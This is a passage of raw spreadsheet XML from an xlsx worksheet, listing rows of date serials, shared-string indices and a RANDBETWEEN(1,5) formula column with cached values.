        <v>43328.056851851848</v>
      </c>
      <c r="C10846" t="s">
        <v>41</v>
      </c>
      <c r="E10846" t="s">
        <v>9704</v>
      </c>
      <c r="F10846">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10847" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A10847" s="1">
        <v>43328.016423611109</v>
      </c>
      <c r="C10847" t="s">
        <v>17</v>
      </c>
      <c r="D10847" t="s">
        <v>17</v>
      </c>
      <c r="E10847" s="2" t="s">
        <v>9705</v>
      </c>
      <c r="F10847">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10848" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A10848" s="1">
        <v>43328.011087962965</v>
      </c>
      <c r="C10848" t="s">
        <v>3652</v>
      </c>
      <c r="D10848" t="s">
        <v>14</v>
      </c>
      <c r="E10848" s="2" t="s">
        <v>9706</v>
      </c>
      <c r="F10848">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10849" s="1">
        <v>43327.997627314813</v>
      </c>
      <c r="C10849" t="s">
        <v>314</v>
      </c>
      <c r="E10849" t="s">
        <v>9707</v>
      </c>
      <c r="F10849">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10850" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10850" s="1">
        <v>43327.982002314813</v>
      </c>
      <c r="C10850" t="s">
        <v>140</v>
      </c>
      <c r="D10850" t="s">
        <v>234</v>
      </c>
      <c r="E10850" t="s">
        <v>9708</v>
      </c>
      <c r="F10850">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10851" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10851" s="1">
        <v>43327.953796296293</v>
      </c>
      <c r="C10851" t="s">
        <v>463</v>
      </c>
      <c r="D10851" t="s">
        <v>1091</v>
      </c>
      <c r="E10851" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="F10851">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10852" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10852" s="1">
        <v>43327.949328703704</v>
      </c>
      <c r="C10852" t="s">
        <v>17</v>
      </c>
      <c r="D10852" t="s">
        <v>244</v>
      </c>
      <c r="E10852" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10852">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10853" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A10853" s="1">
        <v>43327.930254629631</v>
      </c>
      <c r="C10853" t="s">
        <v>103</v>
      </c>
      <c r="D10853" t="s">
        <v>374</v>
      </c>
      <c r="E10853" s="2" t="s">
        <v>9709</v>
      </c>
      <c r="F10853">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10854" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A10854" s="1">
        <v>43327.894872685189</v>
      </c>
      <c r="C10854" t="s">
        <v>118</v>
      </c>
      <c r="E10854" s="2" t="s">
        <v>9710</v>
      </c>
      <c r="F10854">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10855" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10855" s="1">
        <v>43327.88890046296</v>
      </c>
      <c r="C10855" t="s">
        <v>3106</v>
      </c>
      <c r="D10855" t="s">
        <v>17</v>
      </c>
      <c r="E10855" t="s">
        <v>9711</v>
      </c>
      <c r="F10855">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10856" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10856" s="1">
        <v>43327.852881944447</v>
      </c>
      <c r="C10856" t="s">
        <v>29</v>
      </c>
      <c r="D10856" t="s">
        <v>1091</v>
      </c>
      <c r="E10856" s="2" t="s">
        <v>5768</v>
      </c>
      <c r="F10856">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10857" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10857" s="1">
        <v>43327.831585648149</v>
      </c>
      <c r="C10857" t="s">
        <v>9712</v>
      </c>
      <c r="D10857" t="s">
        <v>36</v>
      </c>
      <c r="E10857" s="2" t="s">
        <v>9713</v>
      </c>
      <c r="F10857">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10858" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10858" s="1">
        <v>43327.798206018517</v>
      </c>
      <c r="C10858" t="s">
        <v>8440</v>
      </c>
      <c r="D10858" t="s">
        <v>114</v>
      </c>
      <c r="E10858" s="2" t="s">
        <v>9714</v>
      </c>
      <c r="F10858">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10859" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A10859" s="1">
        <v>43327.790509259263</v>
      </c>
      <c r="C10859" t="s">
        <v>10</v>
      </c>
      <c r="D10859" t="s">
        <v>89</v>
      </c>
      <c r="E10859" s="2" t="s">
        <v>9715</v>
      </c>
      <c r="F10859">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10860" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10860" s="1">
        <v>43327.778969907406</v>
      </c>
      <c r="C10860" t="s">
        <v>1408</v>
      </c>
      <c r="D10860" t="s">
        <v>114</v>
      </c>
      <c r="E10860" s="2" t="s">
        <v>9716</v>
      </c>
      <c r="F10860">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10861" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A10861" s="1">
        <v>43327.768958333334</v>
      </c>
      <c r="C10861" t="s">
        <v>2210</v>
      </c>
      <c r="D10861" t="s">
        <v>41</v>
      </c>
      <c r="E10861" s="2" t="s">
        <v>9717</v>
      </c>
      <c r="F10861">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10862" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10862" s="1">
        <v>43327.764340277776</v>
      </c>
      <c r="C10862" t="s">
        <v>796</v>
      </c>
      <c r="D10862" t="s">
        <v>124</v>
      </c>
      <c r="E10862" s="2" t="s">
        <v>9718</v>
      </c>
      <c r="F10862">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10863" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10863" s="1">
        <v>43327.754803240743</v>
      </c>
      <c r="C10863" t="s">
        <v>10</v>
      </c>
      <c r="D10863" t="s">
        <v>374</v>
      </c>
      <c r="E10863" t="s">
        <v>9719</v>
      </c>
      <c r="F10863">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10864" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10864" s="1">
        <v>43327.739479166667</v>
      </c>
      <c r="C10864" t="s">
        <v>865</v>
      </c>
      <c r="D10864" t="s">
        <v>14</v>
      </c>
      <c r="E10864" s="2" t="s">
        <v>9720</v>
      </c>
      <c r="F10864">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10865" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A10865" s="1">
        <v>43327.729178240741</v>
      </c>
      <c r="C10865" t="s">
        <v>4500</v>
      </c>
      <c r="D10865" t="s">
        <v>667</v>
      </c>
      <c r="E10865" s="2" t="s">
        <v>9721</v>
      </c>
      <c r="F10865">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10866" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10866" s="1">
        <v>43327.72861111111</v>
      </c>
      <c r="C10866" t="s">
        <v>10</v>
      </c>
      <c r="D10866" t="s">
        <v>163</v>
      </c>
      <c r="E10866" s="2" t="s">
        <v>9722</v>
      </c>
      <c r="F10866">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10867" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10867" s="1">
        <v>43327.726157407407</v>
      </c>
      <c r="C10867" t="s">
        <v>17</v>
      </c>
      <c r="D10867" t="s">
        <v>271</v>
      </c>
      <c r="E10867" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10867">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10868" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10868" s="1">
        <v>43327.701724537037</v>
      </c>
      <c r="C10868" t="s">
        <v>10</v>
      </c>
      <c r="D10868" t="s">
        <v>6</v>
      </c>
      <c r="E10868" s="2" t="s">
        <v>9723</v>
      </c>
      <c r="F10868">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10869" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10869" s="1">
        <v>43327.69667824074</v>
      </c>
      <c r="C10869" t="s">
        <v>463</v>
      </c>
      <c r="D10869" t="s">
        <v>713</v>
      </c>
      <c r="E10869" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="F10869">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10870" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10870" s="1">
        <v>43327.693692129629</v>
      </c>
      <c r="C10870" t="s">
        <v>17</v>
      </c>
      <c r="D10870" t="s">
        <v>244</v>
      </c>
      <c r="E10870" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10870">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10871" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10871" s="1">
        <v>43327.675023148149</v>
      </c>
      <c r="C10871" t="s">
        <v>10</v>
      </c>
      <c r="D10871" t="s">
        <v>89</v>
      </c>
      <c r="E10871" t="s">
        <v>9724</v>
      </c>
      <c r="F10871">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10872" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10872" s="1">
        <v>43327.664675925924</v>
      </c>
      <c r="C10872" t="s">
        <v>10</v>
      </c>
      <c r="D10872" t="s">
        <v>17</v>
      </c>
      <c r="E10872" t="s">
        <v>9725</v>
      </c>
      <c r="F10872">
        <f t="shared" ca="1" si="169"/>
        <v>3</v>
      </c>
    </row>
    <row r="10873" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10873" s="1">
        <v>43327.659270833334</v>
      </c>
      <c r="C10873" t="s">
        <v>463</v>
      </c>
      <c r="D10873" t="s">
        <v>158</v>
      </c>
      <c r="E10873" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="F10873">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10874" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10874" s="1">
        <v>43327.659120370372</v>
      </c>
      <c r="C10874" t="s">
        <v>17</v>
      </c>
      <c r="D10874" t="s">
        <v>602</v>
      </c>
      <c r="E10874" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10874">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10875" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A10875" s="1">
        <v>43327.655578703707</v>
      </c>
      <c r="C10875" t="s">
        <v>156</v>
      </c>
      <c r="D10875" t="s">
        <v>192</v>
      </c>
      <c r="E10875" s="2" t="s">
        <v>9726</v>
      </c>
      <c r="F10875">
        <f t="shared" ca="1" si="169"/>
        <v>1</v>
      </c>
    </row>
    <row r="10876" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10876" s="1">
        <v>43327.649525462963</v>
      </c>
      <c r="C10876" t="s">
        <v>6</v>
      </c>
      <c r="D10876" t="s">
        <v>158</v>
      </c>
      <c r="E10876" s="2" t="s">
        <v>9727</v>
      </c>
      <c r="F10876">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10877" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10877" s="1">
        <v>43327.628101851849</v>
      </c>
      <c r="C10877" t="s">
        <v>10</v>
      </c>
      <c r="D10877" t="s">
        <v>494</v>
      </c>
      <c r="E10877" t="s">
        <v>9728</v>
      </c>
      <c r="F10877">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10878" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10878" s="1">
        <v>43327.622233796297</v>
      </c>
      <c r="C10878" t="s">
        <v>10</v>
      </c>
      <c r="D10878" t="s">
        <v>6</v>
      </c>
      <c r="E10878" t="s">
        <v>9729</v>
      </c>
      <c r="F10878">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10879" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10879" s="1">
        <v>43327.620775462965</v>
      </c>
      <c r="C10879" t="s">
        <v>463</v>
      </c>
      <c r="D10879" t="s">
        <v>1160</v>
      </c>
      <c r="E10879" s="2" t="s">
        <v>9672</v>
      </c>
      <c r="F10879">
        <f t="shared" ca="1" si="169"/>
        <v>4</v>
      </c>
    </row>
    <row r="10880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10880" s="1">
        <v>43327.604756944442</v>
      </c>
      <c r="C10880" t="s">
        <v>6728</v>
      </c>
      <c r="D10880" t="s">
        <v>33</v>
      </c>
      <c r="E10880" t="s">
        <v>9730</v>
      </c>
      <c r="F10880">
        <f t="shared" ca="1" si="169"/>
        <v>5</v>
      </c>
    </row>
    <row r="10881" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10881" s="1">
        <v>43327.604155092595</v>
      </c>
      <c r="C10881" t="s">
        <v>4429</v>
      </c>
      <c r="D10881" t="s">
        <v>2214</v>
      </c>
      <c r="E10881" t="s">
        <v>9731</v>
      </c>
      <c r="F10881">
        <f t="shared" ca="1" si="169"/>
        <v>2</v>
      </c>
    </row>
    <row r="10882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10882" s="1">
        <v>43327.601238425923</v>
      </c>
      <c r="C10882" t="s">
        <v>3106</v>
      </c>
      <c r="D10882" t="s">
        <v>817</v>
      </c>
      <c r="E10882" t="s">
        <v>9732</v>
      </c>
      <c r="F10882">
        <f t="shared" ref="F10882:F10945" ca="1" si="170">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="10883" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10883" s="1">
        <v>43327.548263888886</v>
      </c>
      <c r="C10883" t="s">
        <v>10</v>
      </c>
      <c r="D10883" t="s">
        <v>36</v>
      </c>
      <c r="E10883" t="s">
        <v>9733</v>
      </c>
      <c r="F10883">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10884" s="1">
        <v>43327.540682870371</v>
      </c>
      <c r="C10884" t="s">
        <v>10</v>
      </c>
      <c r="D10884" t="s">
        <v>17</v>
      </c>
      <c r="E10884" t="s">
        <v>9734</v>
      </c>
      <c r="F10884">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10885" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10885" s="1">
        <v>43327.534687500003</v>
      </c>
      <c r="C10885" t="s">
        <v>10</v>
      </c>
      <c r="D10885" t="s">
        <v>112</v>
      </c>
      <c r="E10885" t="s">
        <v>9735</v>
      </c>
      <c r="F10885">
        <f t="shared" ca="1" si="170"/>
        <v>3</v>
      </c>
    </row>
    <row r="10886" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10886" s="1">
        <v>43327.523946759262</v>
      </c>
      <c r="C10886" t="s">
        <v>10</v>
      </c>
      <c r="D10886" t="s">
        <v>71</v>
      </c>
      <c r="E10886" t="s">
        <v>9736</v>
      </c>
      <c r="F10886">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10887" s="1">
        <v>43327.517824074072</v>
      </c>
      <c r="C10887" t="s">
        <v>10</v>
      </c>
      <c r="D10887" t="s">
        <v>112</v>
      </c>
      <c r="E10887" t="s">
        <v>9737</v>
      </c>
      <c r="F10887">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10888" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A10888" s="1">
        <v>43327.516863425924</v>
      </c>
      <c r="C10888" t="s">
        <v>118</v>
      </c>
      <c r="D10888" t="s">
        <v>374</v>
      </c>
      <c r="E10888" s="2" t="s">
        <v>9738</v>
      </c>
      <c r="F10888">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10889" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10889" s="1">
        <v>43327.492407407408</v>
      </c>
      <c r="C10889" t="s">
        <v>6</v>
      </c>
      <c r="D10889" t="s">
        <v>25</v>
      </c>
      <c r="E10889" t="s">
        <v>9739</v>
      </c>
      <c r="F10889">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10890" s="1">
        <v>43327.485833333332</v>
      </c>
      <c r="C10890" t="s">
        <v>6</v>
      </c>
      <c r="D10890" t="s">
        <v>114</v>
      </c>
      <c r="E10890" t="s">
        <v>9740</v>
      </c>
      <c r="F10890">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10891" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10891" s="1">
        <v>43327.468969907408</v>
      </c>
      <c r="C10891" t="s">
        <v>10</v>
      </c>
      <c r="D10891" t="s">
        <v>52</v>
      </c>
      <c r="E10891" t="s">
        <v>9741</v>
      </c>
      <c r="F10891">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10892" s="1">
        <v>43327.463564814818</v>
      </c>
      <c r="C10892" t="s">
        <v>10</v>
      </c>
      <c r="D10892" t="s">
        <v>178</v>
      </c>
      <c r="E10892" t="s">
        <v>9742</v>
      </c>
      <c r="F10892">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10893" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10893" s="1">
        <v>43327.453321759262</v>
      </c>
      <c r="C10893" t="s">
        <v>10</v>
      </c>
      <c r="D10893" t="s">
        <v>17</v>
      </c>
      <c r="E10893" s="2" t="s">
        <v>9743</v>
      </c>
      <c r="F10893">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10894" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10894" s="1">
        <v>43327.448414351849</v>
      </c>
      <c r="C10894" t="s">
        <v>10</v>
      </c>
      <c r="D10894" t="s">
        <v>192</v>
      </c>
      <c r="E10894" t="s">
        <v>9744</v>
      </c>
      <c r="F10894">
        <f t="shared" ca="1" si="170"/>
        <v>3</v>
      </c>
    </row>
    <row r="10895" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10895" s="1">
        <v>43327.447546296295</v>
      </c>
      <c r="C10895" t="s">
        <v>10</v>
      </c>
      <c r="D10895" t="s">
        <v>89</v>
      </c>
      <c r="E10895" t="s">
        <v>9745</v>
      </c>
      <c r="F10895">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10896" s="1">
        <v>43327.434629629628</v>
      </c>
      <c r="C10896" t="s">
        <v>3106</v>
      </c>
      <c r="D10896" t="s">
        <v>112</v>
      </c>
      <c r="E10896" t="s">
        <v>9746</v>
      </c>
      <c r="F10896">
        <f t="shared" ca="1" si="170"/>
        <v>3</v>
      </c>
    </row>
    <row r="10897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10897" s="1">
        <v>43327.427824074075</v>
      </c>
      <c r="C10897" t="s">
        <v>10</v>
      </c>
      <c r="D10897" t="s">
        <v>33</v>
      </c>
      <c r="E10897" t="s">
        <v>9747</v>
      </c>
      <c r="F10897">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10898" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10898" s="1">
        <v>43327.418923611112</v>
      </c>
      <c r="C10898" t="s">
        <v>10</v>
      </c>
      <c r="D10898" t="s">
        <v>89</v>
      </c>
      <c r="E10898" t="s">
        <v>9748</v>
      </c>
      <c r="F10898">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10899" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10899" s="1">
        <v>43327.418229166666</v>
      </c>
      <c r="C10899" t="s">
        <v>17</v>
      </c>
      <c r="D10899" t="s">
        <v>33</v>
      </c>
      <c r="E10899" s="2" t="s">
        <v>9682</v>
      </c>
      <c r="F10899">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10900" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10900" s="1">
        <v>43327.411712962959</v>
      </c>
      <c r="C10900" t="s">
        <v>10</v>
      </c>
      <c r="D10900" t="s">
        <v>163</v>
      </c>
      <c r="E10900" t="s">
        <v>9749</v>
      </c>
      <c r="F10900">
        <f t="shared" ca="1" si="170"/>
        <v>5</v>
      </c>
    </row>
    <row r="10901" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A10901" s="1">
        <v>43327.411689814813</v>
      </c>
      <c r="C10901" t="s">
        <v>301</v>
      </c>
      <c r="E10901" s="2" t="s">
        <v>9750</v>
      </c>
      <c r="F10901">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10902" s="1">
        <v>43327.409097222226</v>
      </c>
      <c r="C10902" t="s">
        <v>67</v>
      </c>
      <c r="E10902" t="s">
        <v>9751</v>
      </c>
      <c r="F10902">
        <f t="shared" ca="1" si="170"/>
        <v>3</v>
      </c>
    </row>
    <row r="10903" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10903" s="1">
        <v>43327.401307870372</v>
      </c>
      <c r="C10903" t="s">
        <v>10</v>
      </c>
      <c r="D10903" t="s">
        <v>14</v>
      </c>
      <c r="E10903" t="s">
        <v>9752</v>
      </c>
      <c r="F10903">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10904" s="1">
        <v>43327.399548611109</v>
      </c>
      <c r="C10904" t="s">
        <v>10</v>
      </c>
      <c r="D10904" t="s">
        <v>14</v>
      </c>
      <c r="E10904" t="s">
        <v>9752</v>
      </c>
      <c r="F10904">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10905" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10905" s="1">
        <v>43327.389710648145</v>
      </c>
      <c r="C10905" t="s">
        <v>10</v>
      </c>
      <c r="D10905" t="s">
        <v>107</v>
      </c>
      <c r="E10905" t="s">
        <v>9753</v>
      </c>
      <c r="F10905">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10906" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10906" s="1">
        <v>43327.387094907404</v>
      </c>
      <c r="C10906" t="s">
        <v>10</v>
      </c>
      <c r="D10906" t="s">
        <v>23</v>
      </c>
      <c r="E10906" t="s">
        <v>9754</v>
      </c>
      <c r="F10906">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10907" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10907" s="1">
        <v>43327.367465277777</v>
      </c>
      <c r="C10907" t="s">
        <v>1056</v>
      </c>
      <c r="D10907" t="s">
        <v>39</v>
      </c>
      <c r="E10907" t="s">
        <v>8504</v>
      </c>
      <c r="F10907">
        <f t="shared" ca="1" si="170"/>
        <v>3</v>
      </c>
    </row>
    <row r="10908" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A10908" s="1">
        <v>43327.364918981482</v>
      </c>
      <c r="C10908" t="s">
        <v>328</v>
      </c>
      <c r="E10908" s="2" t="s">
        <v>9755</v>
      </c>
      <c r="F10908">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10909" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A10909" s="1">
        <v>43327.363078703704</v>
      </c>
      <c r="C10909" t="s">
        <v>471</v>
      </c>
      <c r="E10909" s="2" t="s">
        <v>9756</v>
      </c>
      <c r="F10909">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10910" s="1">
        <v>43327.358969907407</v>
      </c>
      <c r="C10910" t="s">
        <v>10</v>
      </c>
      <c r="D10910" t="s">
        <v>14</v>
      </c>
      <c r="E10910" t="s">
        <v>9757</v>
      </c>
      <c r="F10910">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10911" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10911" s="1">
        <v>43327.358032407406</v>
      </c>
      <c r="C10911" t="s">
        <v>48</v>
      </c>
      <c r="E10911" t="s">
        <v>9758</v>
      </c>
      <c r="F10911">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10912" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10912" s="1">
        <v>43327.35533564815</v>
      </c>
      <c r="C10912" t="s">
        <v>5361</v>
      </c>
      <c r="E10912" s="2" t="s">
        <v>9759</v>
      </c>
      <c r="F10912">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10913" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10913" s="1">
        <v>43327.341307870367</v>
      </c>
      <c r="C10913" t="s">
        <v>16</v>
      </c>
      <c r="E10913" t="s">
        <v>9572</v>
      </c>
      <c r="F10913">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10914" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A10914" s="1">
        <v>43327.332881944443</v>
      </c>
      <c r="C10914" t="s">
        <v>17</v>
      </c>
      <c r="E10914" s="2" t="s">
        <v>9760</v>
      </c>
      <c r="F10914">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10915" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10915" s="1">
        <v>43327.331365740742</v>
      </c>
      <c r="C10915" t="s">
        <v>10</v>
      </c>
      <c r="D10915" t="s">
        <v>163</v>
      </c>
      <c r="E10915" t="s">
        <v>9761</v>
      </c>
      <c r="F10915">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10916" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A10916" s="1">
        <v>43327.323761574073</v>
      </c>
      <c r="C10916" t="s">
        <v>71</v>
      </c>
      <c r="E10916" s="2" t="s">
        <v>9762</v>
      </c>
      <c r="F10916">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10917" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A10917" s="1">
        <v>43327.294479166667</v>
      </c>
      <c r="C10917" t="s">
        <v>103</v>
      </c>
      <c r="D10917" t="s">
        <v>2139</v>
      </c>
      <c r="E10917" s="2" t="s">
        <v>9763</v>
      </c>
      <c r="F10917">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10918" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A10918" s="1">
        <v>43327.208067129628</v>
      </c>
      <c r="C10918" t="s">
        <v>559</v>
      </c>
      <c r="E10918" s="2" t="s">
        <v>9764</v>
      </c>
      <c r="F10918">
        <f t="shared" ca="1" si="170"/>
        <v>1</v>
      </c>
    </row>
    <row r="10919" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A10919" s="1">
        <v>43327.198287037034</v>
      </c>
      <c r="C10919" t="s">
        <v>48</v>
      </c>
      <c r="E10919" s="2" t="s">
        <v>9765</v>
      </c>
      <c r="F10919">
        <f t="shared" ca="1" si="170"/>
        <v>4</v>
      </c>
    </row>
    <row r="10920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A10920" s="1">
        <v>43327.19458333333</v>
      </c>
      <c r="C10920" t="s">
        <v>23</v>
      </c>
      <c r="E10920" t="s">
        <v>9766</v>
      </c>
      <c r="F10920">
        <f t="shared" ca="1" si="170"/>
        <v>2</v>
      </c>
    </row>
    <row r="10921" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A10921" s="1">
        <v>43327.192314814813</v>
      </c>
      <c r="C10921" t="s">
        <v>71</v>
      </c>
      <c r="E10921" s="2" t="s">
        <v>9767</v>
      </c>
      <c r="F10921">
        <f t="shared" ca="1" si="170"/>
